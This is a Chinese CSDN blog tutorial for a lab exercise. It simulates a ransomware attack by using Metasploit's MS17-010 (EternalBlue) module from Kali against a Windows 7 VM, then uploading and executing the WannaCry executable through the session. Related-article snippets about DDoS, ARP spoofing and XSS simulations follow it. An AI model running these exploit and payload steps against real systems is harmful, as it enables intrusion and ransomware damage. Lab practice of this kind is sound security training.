4.模拟攻击

已于 2023-08-07 09:21:01 修改
阅读量46 收藏
点赞数
文章标签: web安全
于 2023-08-07 08:59:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50765147/article/details/132139134
版权
勒索病毒模拟攻击

  • 攻击机:kali(192.168.1.1)

  • 靶机:win7(192.168.1.2)

  • 启动msf

    • msfconsole

  • 搜索相关模块

    • search ms17-010

    • 在这里插入图片描述

    • 使用永痕之蓝进行攻击

    • use 0

  • 配置参数

    • 查看 options(要求为yes的为必填项)

    • 在这里插入图片描述

    • set rhosts 192.168.1.2

  • 开始攻击

    • run
    • 显示win,并返回会话,表示攻击成功了
    • 在这里插入图片描述

  • 上传病毒

    • 先获取个病毒,明确其路径

    • 通过upload上传文件

      • upload /root/test/病毒.exe

    • 在这里插入图片描述

    • 查看上传路径

      • pwd

    • 执行文件

      • execute -f wcry.exe

    • 判断是否执行

      • ps -ef | grep wcry.exe
岁月冲淡々
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
02.iptables攻击防御
bin080808jie的专栏
04-07 1484
DDOS 攻击 分布式拒绝服务(Distributed Denial of service) 多计算机联合发起DOS攻击,造成目标机器资源耗尽、系统过载 DDOS 攻击方式 Ping flood:大量ping包 Ping of Death:修改后的ping包,如造成逻辑错误、加长数据包使其超过IP报文限制 Teardrop attacks:损坏的IP包,如重叠的包或过大的包负荷 UDP Flood:大量udp小包 SYN flood.
SYN Flood模拟攻击
weixin_34284188的博客
08-09 1952
为什么80%的码农都做不了架构师?>>> ...
简单模拟XSS攻击
公众号 Java4ye
07-06 2803
我的个人网站 www.ryzeyang.top. 前端提供一个简单的用户注册表单页面,后端使用node.js搭建,并运用express搭建简单的web应用,通过body-parser解析用户post上来的信息,模拟简单的xss攻击 目录什么是xss呢?小demo简介vscode安装node.js插件代码前端页面后端代码(node+express+body-parser)结果下载 什么是xss呢? xss即跨站脚本攻击,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访
DDoS攻击模拟与Metasploitable渗透
zzr2zr的博客
01-04 7140
DDoS攻击模拟与Metasploitable渗透 Part.1 DDoS介绍和发展史 1.DDoS:Distributed Denial of Service,分布式拒绝服务攻击。 2.带宽消耗型攻击,所谓带宽消耗型攻击就是攻击者将提供网络服务的正常的带宽消耗殆尽,带宽消耗殆尽后就会造成网络堵塞,从而当正常的用户与服务器进行通信时无法提供正常服务。举vps的例子,vps服务器一般都有固定的带宽,...
网络协议与攻击模拟
YangYubo091699的博客
05-07 3020
协议 TCP/IP协议簇 网络接口层(没有特定的协议) 物理层 (PPPOE-宽带拨号) 数据链路层 网络层:IP(v4/v6)、ARP(地址解析协议)、RARP、ICMP(internet控制报文协议)、IGMP 传输层:TCP(传输控制协议) UDP(用户数据包协议) 应用层:都是基于传输层协议的端口,总共端口0-65536 固定协议的端口号0-1023 DHCP DNS HTTP 80 HTTPS 443 FTP SMTP POP3 IMAP 流量抓取工具(wireshark
arp攻击欺骗模拟
qq_52619275的博客
04-15 846
一、科莱网络分析系统打开 二、开始抓包, 1.并打开cmd ping一下网关 2.可以看到抓包 3.右击点arp response 的数据包,选择发送数据包到数据包生成器 4.看到生成器 三、抓取同网段mac地址 1.使用工具中的mac地址扫描器 2.复制其中想要攻击的ip的mac地址 四、发动攻击 1.在第二步打开的生成器中在目标mac地址粘贴所复制的 2.最好改动一下源mac地址和ip,伪装自己防止别人查到 3.注意这里发送的数据包ip是网关ip地址,是因为欺骗对方我是网关,向我发送数据包,可
echarts地图模拟攻击特效
rijian_code的博客
12-26 7671
这是根据echarts提供的地图迁徙修改涟漪特效做出的模拟效果,然而这并不符合我们需求。。。。我们需要一种仿真的攻击效果,更强的视野冲击,目前官方仅仅开放涟漪特效。    这是要达到的效果。  有兴趣的朋友可以去官网看看  http://map.norsecorp.com     首先第一步。我本地写了一个测试,还不没融合到echarts的chart类中;  我先上我写的模拟攻击特效
网络协议与攻击模拟_06攻击模拟SYN Flood
fencecat的博客
01-23 1233
SYN Flood原理:在TCP三次握手过程中,客户端发送一个SYN包给服务器;服务端接收到SYN包后,会回复SYN+ACK包给客户端,然后等待客户端回复ACK包。但此时客户端并不会回复ACK包,所以服务端就只能一直等待直到超时。服务端超时后会重发SYN+ACK包给客户端,默认会重试5次,而且每次等待的时间都会增加。服务器收到客户端发来的SYN会建立一个半连接状态的Socket,当客户端在一定时间内持续不断的发大量的SYN包但不回复ACK包,就会耗尽服务端的资源,这就是SYN Flood攻击
模拟ARP欺骗攻击与防护
Brighteststart的博客
12-24 5819
为保证网络环境的安全模拟ARP欺骗在eNSP模拟器+VMware虚拟机上构建网络环境。   准备环境:华为eNSP模拟器+VMware虚拟机上创建kali服务器 在虚拟机上打开kali服务器,利用Ettercap嗅探工具 关于Ettercap工具    一款全面的中间人攻击、网络嗅探套件,主要适用于交换网络,支持APR/DNS/SSH等许多协议,可用来检测网络内明文数据通讯的安全性,以便及时采取措施,避免敏感的用户名、密码等数据以明文方式传输。  进入ettercap graphical
hping模拟DDOS攻击
热门推荐
discovery的博客
01-16 1万+
Hping ddos攻击 安装 安装依赖库 yum install -y libpcap-devel tcl-devel 下载源码 wget http://www.hping.org/hping3-20051105.tar.gz 解压安装 tar zxvf hping3-20051105.tar.gz cd hping3-20051105 ./configure 出错:
简单模拟XSS攻击.zip
07-05
前端提供一个简单的用户注册表单页面,后端使用node.js搭建,并运用express搭建简单的web应用,通过body-parser解析用户post上来的信息,模拟简单的xss攻击
网络安全实验--洪泛攻击.docx
06-09
一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题,但如果有一个恶意的攻击者大量模拟这种情况,服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源。实际上如果服务器的TCP/IP栈不够...
实验 5、Padding Oracle 攻击
05-07
21f18aa577c0bdf302936266926ff37dbf7035d5eeb4 当用户 Alice 和网站进行交互时,网站将上述 URL 发送给 Alice。攻击者 猜测在"po?er="这一 URL 变量的值可能 Alice 会话中的一个一些秘密数据。该 数据使用 AES CBC...
log4j2-rce靶场.zip
01-16
在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
C#winform工具模拟getpost请求,app防攻击加密源码
09-24
2,写的接口总是被攻击的可以借鉴此加密方式。 【2】为啥要写这个 1,近期我们团队做的App接口被破解,老是被频繁调用,服务器致瘫; 2,想了办法加密了,如果遇到问题想调试,没办法通过日志里的请求串来直接调用;...
前端基础入门三大核心之网络安全篇:TLS/SSL的魔法之旅
最新发布
一个做过前端开发的产品经理,经历过睿智产品的折磨导致脱发之后,励志要翻身"农奴"把歌唱,一边打入敌人内部一边持续提升自己,为我们广大开发同胞谋福祉,坚决抵制睿智产品折磨我们码农兄弟!
05-21 554
TLS/SSL,这个看似复杂的协议,实际上正默默地守护着我们每一次的在线交互。作为前端开发者,理解其工作原理并在日常开发中实践安全最佳实践,是我们每个人的职责。现在,当你再次看到地址栏那个绿色的小锁图标时,是不是觉得它更加亲切了呢?关于TLS/SSL,你还有哪些独到的见解或实战经历?欢迎在评论区留言,让我们共同探讨,携手营造一个更安全的网络环境。欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 599
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
CTF如何学习?
小司机的奥拓
05-14 923
作和项目会带来影响,毕竟你不可能打一辈子的CTF,而CTF和实战还是有区别,过度沉浸于CTF的模式当中会让你在实战中却无从下手**
了解网络安全行业内有哪些公司?
aheyor的博客
05-14 928
https://wenku.baidu.com/view/8de38c790440be1e650e52ea551810a6f424c80f?aggId=f2f58cc8e618964bcf84b9d528ea81c758f52ecc&fr=catalogMain_text_ernie_recall_feed_index%3Awk_recommend_main4&_wkts_=1715651666515&bdQuery=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85
如何用Matlab模拟地铁网络受到攻击的状态
06-11
3. 模拟攻击节点对网络的破坏,可以是破坏节点之间的通信,也可以是破坏节点本身的功能。 4. 观察网络的状态变化,可以通过绘制网络拓扑图、计算网络性能指标等方式来分析网络的受损程度。 需要注意的是,在模拟...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值